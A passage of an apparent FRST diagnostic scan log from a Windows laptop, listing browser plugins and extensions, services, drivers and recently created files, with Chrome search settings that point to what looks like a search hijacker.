Tcpip\..\Interfaces\{9cc31965-f3ac-45a8-a3c1-a9ad1c45f485}: [DhcpNameServer] 192.168.6.1 64.134.255.2 64.134.255.10
Tcpip\..\Interfaces\{c78fcb73-f14a-4b1e-b0ad-7bf0f8fa0b67}: [DhcpNameServer] 192.168.1.1
 
Internet Explorer:
==================
BHO-x32: Adobe PDF Link Helper -> {18DF081C-E8AD-4283-A596-FA578C2EBDC3} -> C:\Program Files (x86)\Common Files\Adobe\Acrobat\ActiveX\AcroIEHelperShim.dll [2012-09-23] (Adobe Systems Incorporated)
BHO-x32: RealNetworks Download and Record Plugin for Internet Explorer -> {3049C3E9-B461-4BC5-8870-4C09146192CA} -> C:\ProgramData\RealNetworks\RealDownloader\BrowserPlugins\IE\rndlbrowserrecordplugin.dll [2013-04-16] (RealDownloader)
BHO-x32: Search Helper -> {6EBF7485-159F-4bff-A14F-B9E3AAC4465B} -> C:\Program Files (x86)\Microsoft\Search Enhancement Pack\Search Helper\SEPsearchhelperie.dll [2010-01-14] (Microsoft Corporation)
BHO-x32: Java™ Plug-In SSV Helper -> {761497BB-D6F0-462C-B6EB-D4DAF1D92D43} -> C:\Program Files (x86)\Java\jre1.8.0_77\bin\ssv.dll [2016-03-29] (Oracle Corporation)
BHO-x32: Skype Plug-In -> {AE805869-2E5C-4ED4-8F7B-F1F7851A4497} -> C:\Program Files (x86)\Skype\Toolbars\Internet Explorer\skypeieplugin.dll [2010-11-22] (Skype Technologies S.A.)
BHO-x32: Java™ Plug-In 2 SSV Helper -> {DBC80044-A445-435b-BC74-9C25C1C588A9} -> C:\Program Files (x86)\Java\jre1.8.0_77\bin\jp2ssv.dll [2016-03-29] (Oracle Corporation)
BHO-x32: Windows Live Toolbar Helper -> {E15A8DC0-8516-42A1-81EA-DC94EC1ACF10} -> C:\Program Files (x86)\Windows Live\Toolbar\wltcore.dll [2009-02-06] (Microsoft Corporation)
DPF: HKLM-x32 {02BCC737-B171-4746-94C9-0D8A0B2C0089} hxxp://office.microsoft.com/sites/production/ieawsdc32.cab
DPF: HKLM-x32 {67DABFBF-D0AB-41FA-9C46-CC0F21721616} hxxp://download.divx.com/player/DivXBrowserPlugin.cab
DPF: HKLM-x32 {6C269571-C6D7-4818-BCA4-32A035E8C884} hxxp://ccfiles.creative.com/Web/softwareupdate/su/ocx/15101/CTSUEng.cab
DPF: HKLM-x32 {E2883E8F-472F-4FB0-9522-AC9BF37916A7} hxxp://platformdl.adobe.com/NOS/getPlusPlus/1.6/gp.cab
DPF: HKLM-x32 {F27237D7-93C8-44C2-AC6E-D6057B9A918F} hxxps://connect.bedbath.com/dana-cached/sc/JuniperSetupClient.cab
DPF: HKLM-x32 {F6ACF75C-C32C-447B-9BEF-46B766368D29} hxxp://ccfiles.creative.com/Web/softwareupdate/su/ocx/15112/CTPID.cab
Handler-x32: cdo - {CD00020A-8B95-11D1-82DB-00C04FB1625D} - C:\Program Files (x86)\Common Files\Microsoft Shared\Web Folders\PKMCDO.DLL [2001-01-22] (Microsoft Corporation)
Handler-x32: livecall - {828030A1-22C1-4009-854F-8E305202313F} - C:\Program Files (x86)\Windows Live\Messenger\msgrapp.14.0.8089.0726.dll [2009-07-26] (Microsoft Corporation)
Handler-x32: msnim - {828030A1-22C1-4009-854F-8E305202313F} - C:\Program Files (x86)\Windows Live\Messenger\msgrapp.14.0.8089.0726.dll [2009-07-26] (Microsoft Corporation)
Handler-x32: skype-ie-addon-data - {91774881-D725-4E58-B298-07617B9B86A8} - C:\Program Files (x86)\Skype\Toolbars\Internet Explorer\skypeieplugin.dll [2010-11-22] (Skype Technologies S.A.)
Handler-x32: skype4com - {FFC8B962-9B40-4DFF-9458-1830C7DD7F5D} - C:\Program Files (x86)\Common Files\Skype\Skype4COM.dll [2013-02-26] (Skype Technologies)
Filter-x32: application/x-ica - {CFB6322E-CC85-4d1b-82C7-893888A236BC} - C:\Program Files (x86)\Citrix\ICA Client\IcaMimeFilter.dll [2015-04-08] (Citrix Systems, Inc.)
Filter-x32: application/x-ica; charset=euc-jp - {CFB6322E-CC85-4d1b-82C7-893888A236BC} - C:\Program Files (x86)\Citrix\ICA Client\IcaMimeFilter.dll [2015-04-08] (Citrix Systems, Inc.)
Filter-x32: application/x-ica; charset=ISO-8859-1 - {CFB6322E-CC85-4d1b-82C7-893888A236BC} - C:\Program Files (x86)\Citrix\ICA Client\IcaMimeFilter.dll [2015-04-08] (Citrix Systems, Inc.)
Filter-x32: application/x-ica; charset=MS936 - {CFB6322E-CC85-4d1b-82C7-893888A236BC} - C:\Program Files (x86)\Citrix\ICA Client\IcaMimeFilter.dll [2015-04-08] (Citrix Systems, Inc.)
Filter-x32: application/x-ica; charset=MS949 - {CFB6322E-CC85-4d1b-82C7-893888A236BC} - C:\Program Files (x86)\Citrix\ICA Client\IcaMimeFilter.dll [2015-04-08] (Citrix Systems, Inc.)
Filter-x32: application/x-ica; charset=MS950 - {CFB6322E-CC85-4d1b-82C7-893888A236BC} - C:\Program Files (x86)\Citrix\ICA Client\IcaMimeFilter.dll [2015-04-08] (Citrix Systems, Inc.)
Filter-x32: application/x-ica; charset=UTF-8 - {CFB6322E-CC85-4d1b-82C7-893888A236BC} - C:\Program Files (x86)\Citrix\ICA Client\IcaMimeFilter.dll [2015-04-08] (Citrix Systems, Inc.)
Filter-x32: application/x-ica; charset=UTF8 - {CFB6322E-CC85-4d1b-82C7-893888A236BC} - C:\Program Files (x86)\Citrix\ICA Client\IcaMimeFilter.dll [2015-04-08] (Citrix Systems, Inc.)
Filter-x32: application/x-ica;charset=euc-jp - {CFB6322E-CC85-4d1b-82C7-893888A236BC} - C:\Program Files (x86)\Citrix\ICA Client\IcaMimeFilter.dll [2015-04-08] (Citrix Systems, Inc.)
Filter-x32: application/x-ica;charset=ISO-8859-1 - {CFB6322E-CC85-4d1b-82C7-893888A236BC} - C:\Program Files (x86)\Citrix\ICA Client\IcaMimeFilter.dll [2015-04-08] (Citrix Systems, Inc.)
Filter-x32: application/x-ica;charset=MS936 - {CFB6322E-CC85-4d1b-82C7-893888A236BC} - C:\Program Files (x86)\Citrix\ICA Client\IcaMimeFilter.dll [2015-04-08] (Citrix Systems, Inc.)
Filter-x32: application/x-ica;charset=MS949 - {CFB6322E-CC85-4d1b-82C7-893888A236BC} - C:\Program Files (x86)\Citrix\ICA Client\IcaMimeFilter.dll [2015-04-08] (Citrix Systems, Inc.)
Filter-x32: application/x-ica;charset=MS950 - {CFB6322E-CC85-4d1b-82C7-893888A236BC} - C:\Program Files (x86)\Citrix\ICA Client\IcaMimeFilter.dll [2015-04-08] (Citrix Systems, Inc.)
Filter-x32: application/x-ica;charset=UTF-8 - {CFB6322E-CC85-4d1b-82C7-893888A236BC} - C:\Program Files (x86)\Citrix\ICA Client\IcaMimeFilter.dll [2015-04-08] (Citrix Systems, Inc.)
Filter-x32: application/x-ica;charset=UTF8 - {CFB6322E-CC85-4d1b-82C7-893888A236BC} - C:\Program Files (x86)\Citrix\ICA Client\IcaMimeFilter.dll [2015-04-08] (Citrix Systems, Inc.)
Filter-x32: ica - {CFB6322E-CC85-4d1b-82C7-893888A236BC} - C:\Program Files (x86)\Citrix\ICA Client\IcaMimeFilter.dll [2015-04-08] (Citrix Systems, Inc.)
 
FireFox:
========
FF Plugin: @adobe.com/FlashPlayer -> C:\windows\system32\Macromed\Flash\NPSWF64_16_0_0_305.dll [2015-02-06] ()
FF Plugin: @esn/npbattlelog,version=2.6.2 -> C:\Program Files (x86)\Battlelog Web Plugins\2.6.2\npbattlelogx64.dll [2015-01-13] (EA Digital Illusions CE AB)
FF Plugin: @Microsoft.com/NpCtrl,version=1.0 -> C:\Program Files\Microsoft Silverlight\5.1.40416.0\npctrl.dll [2015-04-16] ( Microsoft Corporation)
FF Plugin-x32: @adobe.com/FlashPlayer -> C:\windows\SysWOW64\Macromed\Flash\NPSWF32_16_0_0_305.dll [2015-02-06] ()
FF Plugin-x32: @Apple.com/iTunes,version=1.0 -> C:\Program Files (x86)\iTunes\Mozilla Plugins\npitunes.dll [2014-02-18] ()
FF Plugin-x32: @Citrix.com/npican -> C:\Program Files (x86)\Citrix\ICA Client\npicaN.dll [2015-04-08] (Citrix Systems, Inc.)
FF Plugin-x32: @esn/npbattlelog,version=2.6.2 -> C:\Program Files (x86)\Battlelog Web Plugins\2.6.2\npbattlelog.dll [2015-01-13] (EA Digital Illusions CE AB)
FF Plugin-x32: @Google.com/GoogleEarthPlugin -> C:\Program Files (x86)\Google\Google Earth\plugin\npgeplugin.dll [2013-10-07] (Google)
FF Plugin-x32: @java.com/DTPlugin,version=11.77.2 -> C:\Program Files (x86)\Java\jre1.8.0_77\bin\dtplugin\npDeployJava1.dll [2016-03-29] (Oracle Corporation)
FF Plugin-x32: @java.com/JavaPlugin,version=11.77.2 -> C:\Program Files (x86)\Java\jre1.8.0_77\bin\plugin2\npjp2.dll [2016-03-29] (Oracle Corporation)
FF Plugin-x32: @messenger.yahoo.com/YahooMessengerStatePlugin;version=1.0.0.6 -> C:\Program Files (x86)\Yahoo!\Shared\npYState.dll [2011-06-16] (Yahoo! Inc.)
FF Plugin-x32: @Microsoft.com/NpCtrl,version=1.0 -> C:\Program Files (x86)\Microsoft Silverlight\5.1.40416.0\npctrl.dll [2015-04-15] ( Microsoft Corporation)
FF Plugin-x32: @microsoft.com/WLPG,version=14.0.8081.0709 -> C:\Program Files (x86)\Windows Live\Photo Gallery\NPWLPG.dll [2009-07-10] (Microsoft Corporation)
FF Plugin-x32: @Motive.com/NpMotive,version=1.0 -> C:\Program Files (x86)\Common Files\Motive\npMotive.dll [2010-11-08] (Alcatel-Lucent)
FF Plugin-x32: @real.com/nppl3260;version=16.0.2.32 -> C:\Users\RoNiN\Netscape6\nppl3260.dll [2013-07-11] (RealNetworks, Inc.)
FF Plugin-x32: @real.com/nprndlchromebrowserrecordext;version=1.3.2 -> C:\ProgramData\RealNetworks\RealDownloader\BrowserPlugins\MozillaPlugins\nprndlchromebrowserrecordext.dll [2013-04-16] (RealNetworks, Inc.)
FF Plugin-x32: @real.com/nprndlhtml5videoshim;version=1.3.2 -> C:\ProgramData\RealNetworks\RealDownloader\BrowserPlugins\MozillaPlugins\nprndlhtml5videoshim.dll [2013-04-16] (RealNetworks, Inc.)
FF Plugin-x32: @real.com/nprndlpepperflashvideoshim;version=1.3.2 -> C:\ProgramData\RealNetworks\RealDownloader\BrowserPlugins\MozillaPlugins\nprndlpepperflashvideoshim.dll [2013-04-16] (RealNetworks, Inc.)
FF Plugin-x32: @real.com/nprpplugin;version=16.0.2.32 -> C:\Users\RoNiN\Netscape6\nprpplugin.dll [2013-07-11] (RealPlayer)
FF Plugin-x32: @realnetworks.com/npdlplugin;version=1 -> C:\ProgramData\RealNetworks\RealDownloader\BrowserPlugins\npdlplugin.dll [2013-04-16] (RealDownloader)
FF Plugin-x32: @tools.google.com/Google Update;version=3 -> C:\Program Files (x86)\Google\Update\1.3.29.5\npGoogleUpdate3.dll [2016-01-31] (Google Inc.)
FF Plugin-x32: @tools.google.com/Google Update;version=9 -> C:\Program Files (x86)\Google\Update\1.3.29.5\npGoogleUpdate3.dll [2016-01-31] (Google Inc.)
FF Plugin-x32: @veetle.com/veetleCorePlugin,version=0.9.18 -> C:\Program Files (x86)\Veetle\plugins\npVeetle.dll [2010-10-15] (Veetle Inc)
FF Plugin-x32: @veetle.com/veetlePlayerPlugin,version=0.9.18 -> C:\Program Files (x86)\Veetle\Player\npvlc.dll [2010-09-21] (Veetle Inc)
FF Plugin-x32: Adobe Reader -> C:\Program Files (x86)\Adobe\Reader 11.0\Reader\AIR\nppdf32.dll [2013-02-15] (Adobe Systems Inc.)
FF Plugin HKU\S-1-5-21-470165136-1162808608-978993673-1001: @nds.com/PlayerPlugin -> C:\Users\RoNiN\AppData\Local\DIRECTV Player\npPlayerPlugin.dll [2014-03-26] (DIRECTV)
FF Plugin HKU\S-1-5-21-470165136-1162808608-978993673-1001: @tools.google.com/Google Update;version=3 -> C:\Users\RoNiN\AppData\Local\Google\Update\1.3.29.5\npGoogleUpdate3.dll [2016-02-01] (Google Inc.)
FF Plugin HKU\S-1-5-21-470165136-1162808608-978993673-1001: @tools.google.com/Google Update;version=9 -> C:\Users\RoNiN\AppData\Local\Google\Update\1.3.29.5\npGoogleUpdate3.dll [2016-02-01] (Google Inc.)
FF Plugin HKU\S-1-5-21-470165136-1162808608-978993673-1001: NDS.com/PlayerPlugin -> C:\Users\RoNiN\AppData\Local\DIRECTV Player\npPlayerPlugin.dll [2014-03-26] (DIRECTV)
FF HKLM-x32\...\Firefox\Extensions: [{27182e60-b5f3-411c-b545-b44205977502}] - C:\Program Files (x86)\Microsoft\Search Enhancement Pack\Search Helper\firefoxextension\SearchHelperExtension
FF Extension: Search Helper Extension - C:\Program Files (x86)\Microsoft\Search Enhancement Pack\Search Helper\firefoxextension\SearchHelperExtension [2010-10-26] [not signed]
FF HKLM-x32\...\Firefox\Extensions: [quickprint@hp.com] - C:\Program Files (x86)\Hewlett-Packard\SmartPrint\QPExtension
FF Extension: SmartPrintButton - C:\Program Files (x86)\Hewlett-Packard\SmartPrint\QPExtension [2011-01-26] [not signed]
FF HKLM-x32\...\Firefox\Extensions: [{FCE04E1F-9378-4f39-96F6-5689A9159E45}] - C:\ProgramData\RealNetworks\RealDownloader\BrowserPlugins\Firefox\Ext
FF Extension: RealDownloader - C:\ProgramData\RealNetworks\RealDownloader\BrowserPlugins\Firefox\Ext [2013-07-11] [not signed]
 
Chrome: 
=======
CHR DefaultSearchURL: Default -> hxxp://www-searching.com/search.aspx?site=shdefault&prd=smw&pid=s&shr=d&q={searchTerms}&s=Unknown
CHR DefaultSearchKeyword: Default -> www-searching.com
CHR DefaultSuggestURL: Default -> hxxp://api.searchpredict.com/api/?rqtype=ffplugin&siteID=8661&dbCode=1&command={searchTerms}
CHR Profile: C:\Users\RoNiN\AppData\Local\Google\Chrome\User Data\Default
CHR Extension: (Google Docs) - C:\Users\RoNiN\AppData\Local\Google\Chrome\User Data\Default\Extensions\aohghmighlieiainnegkcijnfilokake [2015-10-09]
CHR Extension: (Google Drive) - C:\Users\RoNiN\AppData\Local\Google\Chrome\User Data\Default\Extensions\apdfllckaahabafndbhieahigkjlhalf [2015-10-28]
CHR Extension: (YouTube) - C:\Users\RoNiN\AppData\Local\Google\Chrome\User Data\Default\Extensions\blpcfgokakmgnkcojhhkbfbldkacnbeo [2015-09-26]
CHR Extension: (Google Search) - C:\Users\RoNiN\AppData\Local\Google\Chrome\User Data\Default\Extensions\coobgpohoikkiipiblmjeljniedjpjpf [2015-10-28]
CHR Extension: (MightyText - SMS from PC & Text from Computer) - C:\Users\RoNiN\AppData\Local\Google\Chrome\User Data\Default\Extensions\dkfhfaphfkopdgpbfkebjfcblcafcmpi [2016-04-09]
CHR Extension: (Google Cast (Beta)) - C:\Users\RoNiN\AppData\Local\Google\Chrome\User Data\Default\Extensions\dliochdbjfkdbacpmhlcpmleaejidimm [2016-04-13]
CHR Extension: (Google Calendar) - C:\Users\RoNiN\AppData\Local\Google\Chrome\User Data\Default\Extensions\ejjicmeblgpmajnghnpcppodonldlgfn [2015-10-12]
CHR Extension: (Google Play Music) - C:\Users\RoNiN\AppData\Local\Google\Chrome\User Data\Default\Extensions\fahmaaghhglfmonjliepjlchgpgfmobi [2016-04-28]
CHR Extension: (Google Sheets) - C:\Users\RoNiN\AppData\Local\Google\Chrome\User Data\Default\Extensions\felcaaldnbdncclmgdcncolpebgiejap [2015-11-11]
CHR Extension: (Chrome Remote Desktop) - C:\Users\RoNiN\AppData\Local\Google\Chrome\User Data\Default\Extensions\gbchcmhmhahfdphkhkmpfmihenigjmpp [2016-04-09]
CHR Extension: (Google Cast (Beta)) - C:\Users\RoNiN\AppData\Local\Google\Chrome\User Data\Default\Extensions\gdijeikdkaembjbdobgfkoidjkpbmlkd [2016-03-02]
CHR Extension: (Google Docs Offline) - C:\Users\RoNiN\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi [2016-03-22]
CHR Extension: (Google Keep - notes and lists) - C:\Users\RoNiN\AppData\Local\Google\Chrome\User Data\Default\Extensions\hmjkmjkepdijhoojdojkdfohbdgmmhki [2016-04-26]
CHR Extension: (Facebook Album & Photo Manager) - C:\Users\RoNiN\AppData\Local\Google\Chrome\User Data\Default\Extensions\lgiedegfmekolcplboelnmfoiefpcpfg [2015-08-15]
CHR Extension: (drumbit) - C:\Users\RoNiN\AppData\Local\Google\Chrome\User Data\Default\Extensions\mplpmdejoamenolpcojgegminhcnmibo [2016-02-03]
CHR Extension: (WeatherBug) - C:\Users\RoNiN\AppData\Local\Google\Chrome\User Data\Default\Extensions\njkkjobcechefaoknodniidfjapgfoco [2015-10-12]
CHR Extension: (Chrome Web Store Payments) - C:\Users\RoNiN\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda [2016-04-09]
CHR Extension: (Picasa) - C:\Users\RoNiN\AppData\Local\Google\Chrome\User Data\Default\Extensions\onlgmecjpnejhfeofkgbfgnmdlipdejb [2015-08-15]
CHR Extension: (Gmail) - C:\Users\RoNiN\AppData\Local\Google\Chrome\User Data\Default\Extensions\pjkljhegncpnkpknbcohdijeoejaedia [2015-08-15]
CHR Extension: (Inbox by Gmail) - C:\Users\RoNiN\AppData\Local\Google\Chrome\User Data\Default\Extensions\pkclgpgponpjmpfokoepglboejdobkpl [2015-11-12]
CHR HKLM-x32\...\Chrome\Extension: [gihfmmedoddijgnhkgfgnkeohkpbipol] - hxxps://clients2.google.com/service/update2/crx
CHR HKLM-x32\...\Chrome\Extension: [idhngdhcfkoamngbedgpaokgjbnpdiji] - C:\ProgramData\RealNetworks\RealDownloader\BrowserPlugins\Chrome\Ext\realdownloader.crx [2013-04-16]
 
==================== Services (Whitelisted) ========================
 
(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)
 
S4 ACDaemon; C:\Program Files (x86)\Common Files\ArcSoft\Connection Service\Bin\ACService.exe [113152 2010-03-18] (ArcSoft Inc.)
R2 chromoting; C:\Program Files (x86)\Google\Chrome Remote Desktop\50.0.2661.22\remoting_host.exe [69016 2016-03-08] (Google Inc.)
S4 CLDTVHNService; C:\Program Files (x86)\DirecTV\DirecTV\Kernel\DMP\CLDTVHNService.exe [75048 2009-09-17] ()
S4 ETDService; C:\Program Files\Elantech\ETDService.exe [144104 2015-10-31] (ELAN Microelectronics Corp.)
R2 Fabs; C:\Program Files (x86)\Common Files\MAGIX Services\Database\bin\FABS.exe [1253376 2009-08-27] (MAGIX AG) [File not signed]
S4 FirebirdServerMAGIXInstance; C:\Program Files (x86)\Common Files\MAGIX Services\Database\bin\fbserver.exe [3276800 2008-08-07] (MAGIX®) [File not signed]
S4 McciCMService; C:\Program Files (x86)\Common Files\Motive\McciCMService.exe [319488 2010-11-08] (Alcatel-Lucent) [File not signed]
S4 McciCMService64; C:\Program Files\Common Files\Motive\McciCMService.exe [517632 2010-11-08] (Alcatel-Lucent) [File not signed]
R2 MDM; C:\Program Files (x86)\Common Files\Microsoft Shared\VS7Debug\mdm.exe [270336 2001-02-23] (Microsoft Corporation) [File not signed]
R2 Micro Star SCM; C:\Program Files (x86)\System Control Manager\MSIService.exe [160768 2009-07-09] (Micro-Star International Co., Ltd.) [File not signed]
S4 NvNetworkService; C:\Program Files (x86)\NVIDIA Corporation\NetService\NvNetworkService.exe [1720608 2014-07-25] (NVIDIA Corporation)
S4 NvStreamSvc; C:\Program Files\NVIDIA Corporation\NvStreamSrv\nvstreamsvc.exe [18956064 2014-07-25] (NVIDIA Corporation)
R2 pgsql-8.3; C:\Program Files (x86)\PostgreSQL\8.3\bin\pg_ctl.exe [65536 2008-09-19] (PostgreSQL Global Development Group) [File not signed]
S4 RealNetworks Downloader Resolver Service; C:\Program Files (x86)\RealNetworks\RealDownloader\rndlresolversvc.exe [39056 2013-04-16] ()
S4 ss_conn_service; C:\Program Files\Samsung\USB Drivers\25_escape\conn\ss_conn_service.exe [745224 2015-07-08] (DEVGURU Co., LTD.)
S4 TeamViewer; C:\Program Files (x86)\TeamViewer\TeamViewer_Service.exe [5436176 2015-02-09] (TeamViewer GmbH)
R2 tmInstall; C:\Program Files\Thrustmaster\FFB Racing wheel\drivers\amd64\tmInstall.EXE [50336 2015-09-15] (Thrustmaster®)
S3 WdNisSvc; C:\Program Files\Windows Defender\NisSrv.exe [362928 2015-07-10] (Microsoft Corporation)
S3 WinDefend; C:\Program Files\Windows Defender\MsMpEng.exe [24864 2015-07-10] (Microsoft Corporation)
 
===================== Drivers (Whitelisted) ==========================
 
(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)
 
R3 AnyDVD; C:\Windows\System32\Drivers\AnyDVD.sys [125512 2010-12-01] (SlySoft, Inc.)
R3 AnyDVD; C:\Windows\SysWOW64\Drivers\AnyDVD.sys [125512 2010-12-01] (SlySoft, Inc.)
R3 ArcSoftKsUFilter; C:\Windows\System32\DRIVERS\ArcSoftKsUFilter.sys [19968 2009-05-26] (ArcSoft, Inc.)
S3 BthA2DP; C:\Windows\system32\drivers\BthA2DP.sys [165376 2015-07-09] (Microsoft Corporation)
S3 BthHFAud; C:\Windows\system32\DRIVERS\BthHfAud.sys [36864 2015-07-09] (Microsoft Corporation)
S3 EUCR; C:\Windows\System32\drivers\EUCR6SK.SYS [87888 2009-12-04] (ENE Technology Inc.)
S3 MREMP50; C:\Program Files (x86)\Common Files\Motive\MREMP50.sys [21248 2010-11-08] (Printing Communications Assoc., Inc. (PCAUSA)) [File not signed]
S3 MRESP50; C:\Program Files (x86)\Common Files\Motive\MRESP50.sys [20096 2010-11-08] (Printing Communications Assoc., Inc. (PCAUSA)) [File not signed]
S3 NTIOLib_1_0_4; C:\Program Files (x86)\msi\Live Update 5\NTIOLib_X64.sys [14136 2010-10-22] (MSI)
S3 NvStreamKms; C:\Program Files\NVIDIA Corporation\NvStreamSrv\NvStreamKms.sys [20256 2014-07-25] (NVIDIA Corporation)
R3 nvvad_WaveExtensible; C:\Windows\system32\drivers\nvvad64v.sys [40392 2014-03-31] (NVIDIA Corporation)
R3 rt640x64; C:\Windows\System32\drivers\rt640x64.sys [587264 2015-06-17] (Realtek                                            )
S0 sptd; C:\Windows\System32\Drivers\sptd.sys [834544 2011-02-14] (Duplex Secure Ltd.)
S3 tmbulk; C:\Windows\System32\Drivers\tmbulk.sys [133280 2015-06-30] (© Guillemot R&D, 2015. All rights reserved.)
S3 tmhidusb; C:\Windows\system32\DRIVERS\tmhidusb.sys [170144 2015-09-15] (Thrustmaster)
S3 tmResetMin; C:\Windows\System32\Drivers\tmResetMin.sys [36000 2015-09-15] (© Guillemot R&D, 2013. All rights reserved.)
S3 UdeCx; C:\Windows\System32\drivers\udecx.sys [44032 2015-07-09] ()
S3 WdBoot; C:\Windows\system32\drivers\WdBoot.sys [44568 2015-07-10] (Microsoft Corporation)
R3 WdFilter; C:\Windows\system32\drivers\WdFilter.sys [291680 2015-07-10] (Microsoft Corporation)
R2 WdNisDrv; C:\Windows\System32\Drivers\WdNisDrv.sys [119648 2015-07-10] (Microsoft Corporation)
 
==================== NetSvcs (Whitelisted) ===================
 
(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)
 
 
==================== One Month Created files and folders ========
 
(If an entry is included in the fixlist, the file/folder will be moved.)
 
2016-04-30 14:04 - 2016-04-30 14:04 - 00852798 _____ C:\Users\RoNiN\Downloads\SecurityCheck.exe
2016-04-30 13:18 - 2016-04-30 13:40 - 00000000 ____D C:\Users\RoNiN\Downloads\Ice Cube - The Predator
2016-04-30 13:15 - 2016-04-30 13:15 - 00016148 _____ C:\WINDOWS\system32\RONIN-LAPTOP_RoNiN_HistoryPrediction.bin
2016-04-30 12:58 - 2016-04-30 13:08 - 174238936 _____ C:\Users\RoNiN\Downloads\Ice Cube - The Predator.zip
2016-04-30 12:17 - 2016-04-30 12:42 - 00000000 ____D C:\Users\RoNiN\Downloads\Violent Femmes - We Can Do Anything
2016-04-26 18:17 - 2016-04-30 11:57 - 00000000 ____D C:\Users\RoNiN\Downloads\Santigold - Santogold
2016-04-26 18:17 - 2016-04-30 11:57 - 00000000 ____D C:\Users\RoNiN\Downloads\Santigold - 99 Cents
2016-04-26 18:10 - 2016-04-26 18:30 - 00000000 ____D C:\Users\RoNiN\Downloads\Santigold - Master Of My Make-Believe (Deluxe Edition)
2016-04-26 18:08 - 2016-04-26 18:15 - 00000000 ____D C:\Users\RoNiN\Downloads\Jesse Royal - In Comes The Small Axe
2016-04-21 18:40 - 2016-04-21 18:40 - 00028865 _____ C:\Users\RoNiN\Downloads\JPMC (7).QFX
2016-04-17 00:06 - 2016-04-17 00:07 - 73695845 _____ C:\Users\RoNiN\Downloads\Violent Femmes - We Can Do Anything.zip
2016-04-16 18:32 - 2016-04-16 18:32 - 00000020 ___SH C:\Users\DefaultAppPool\ntuser.ini
2016-04-16 18:32 - 2016-04-16 18:32 - 00000000 _SHDL C:\Users\DefaultAppPool\My Documents
2016-04-16 18:32 - 2016-04-16 18:32 - 00000000 _SHDL C:\Users\DefaultAppPool\Documents\My Videos
2016-04-16 18:32 - 2016-04-16 18:32 - 00000000 _SHDL C:\Users\DefaultAppPool\Documents\My Pictures
2016-04-16 18:32 - 2016-04-16 18:32 - 00000000 _SHDL C:\Users\DefaultAppPool\Documents\My Music
2016-04-16 18:32 - 2016-04-16 18:32 - 00000000 ____D C:\Users\DefaultAppPool
2016-04-16 18:32 - 2015-10-03 04:51 - 00000000 ____D C:\Users\DefaultAppPool\AppData\Roaming\Real
2016-04-16 18:32 - 2015-10-03 04:51 - 00000000 ____D C:\Users\DefaultAppPool\AppData\Roaming\Media Center Programs
2016-04-16 18:32 - 2015-10-03 04:51 - 00000000 ____D C:\Users\DefaultAppPool\AppData\Local\NVIDIA Corporation
2016-04-16 18:32 - 2015-10-03 04:51 - 00000000 ____D C:\Users\DefaultAppPool\AppData\Local\NVIDIA
2016-04-16 18:32 - 2015-10-03 04:51 - 00000000 ____D C:\Users\DefaultAppPool\AppData\Local\Google
2016-04-16 18:28 - 2016-04-16 18:28 - 00001153 _____ C:\Users\RoNiN\Desktop\PokerTracker 4.lnk
2016-04-16 18:25 - 2016-04-16 18:28 - 65753680 _____ C:\Users\RoNiN\Downloads\PT-Install-v4.14.13.exe
2016-04-16 17:27 - 2016-04-16 17:27 - 00000016 _____ C:\ProgramData\mntemp
2016-04-16 16:54 - 2016-04-16 16:55 - 00000000 ____D C:\Users\RoNiN\Downloads\Atmosphere - Southsiders (Deluxe Version)
2016-04-16 16:26 - 2016-04-16 16:39 - 187636022 _____ C:\Users\RoNiN\Downloads\Atmosphere - Southsiders (Deluxe Version).zip
2016-04-16 16:20 - 2016-04-16 16:23 - 00000000 ____D C:\Users\RoNiN\Downloads\Santana - Santana IV
2016-04-16 15:25 - 2016-04-16 15:37 - 181639222 _____ C:\Users\RoNiN\Downloads\Santana - Santana IV.zip
2016-04-16 13:51 - 2016-04-16 13:51 - 00001450 _____ C:\Users\RoNiN\Desktop\JRT.txt
2016-04-16 13:47 - 2016-04-16 13:47 - 01610352 _____ (Malwarebytes) C:\Users\RoNiN\Downloads\JRT.exe
2016-04-16 13:33 - 2016-04-16 13:34 - 03677760 _____ C:\Users\RoNiN\Downloads\adwcleaner_5.111.exe
2016-04-15 19:10 - 2016-04-15 19:10 - 00164396 _____ C:\Users\RoNiN\Desktop\TomDreiling2016Resume.pdf
2016-04-14 21:41 - 2016-04-14 21:41 - 01088288 _____ C:\Users\RoNiN\Downloads\TaxDocument (2).pdf
2016-04-14 21:41 - 2016-04-14 21:41 - 00160537 _____ C:\Users\RoNiN\Downloads\TaxDocument.pdf
2016-04-14 21:37 - 2016-04-14 21:37 - 01088280 _____ C:\Users\RoNiN\Downloads\TaxDocument (1).pdf
2016-04-14 19:07 - 2016-04-16 13:32 - 00000000 ____D C:\ProgramData\Malwarebytes' Anti-Malware (portable)
2016-04-14 19:07 - 2016-04-16 12:08 - 00192216 _____ (Malwarebytes) C:\WINDOWS\system32\Drivers\MBAMSwissArmy.sys
2016-04-14 19:05 - 2016-04-16 13:32 - 00000000 ____D C:\Users\RoNiN\Desktop\mbar
2016-04-14 19:05 - 2016-04-16 12:07 - 00109272 _____ (Malwarebytes) C:\WINDOWS\system32\Drivers\mbamchameleon.sys
2016-04-14 18:56 - 2016-04-14 19:05 - 16563352 _____ (Malwarebytes Corp.) C:\Users\RoNiN\Downloads\mbar-1.09.3.1001.exe
2016-04-14 18:55 - 2016-04-14 18:55 - 00159486 _____ C:\Users\RoNiN\Downloads\TomDreiling2015Resume (1).pdf
2016-04-10 19:08 - 2016-04-10 19:14 - 98655550 _____ C:\Users\RoNiN\Downloads\ECOMM - Brian Laney - Alert Technologies.pdf
2016-04-09 10:36 - 2016-04-09 10:36 - 00002547 _____ C:\Users\Public\Desktop\TurboTax 2015.lnk
2016-04-09 10:36 - 2016-04-09 10:36 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\TurboTax 2015
2016-04-09 01:20 - 2016-04-09 01:22 - 00000000 ____D C:\Users\RoNiN\Downloads\Cypress Hill - Cypress X Rusko EP (With Rusko)
2016-04-09 00:24 - 2016-04-09 00:31 - 39492246 _____ C:\Users\RoNiN\Downloads\Cypress Hill - Cypress X Rusko EP (With Rusko).zip
2016-04-09 00:02 - 2016-04-09 00:15 - 00000000 ____D C:\Users\RoNiN\Downloads\Weezer - Weezer (White Album)
2016-04-09 00:02 - 2016-04-09 00:12 - 00000000 ____D C:\Users\RoNiN\Downloads\A Tribe Called Quest - The Best Of
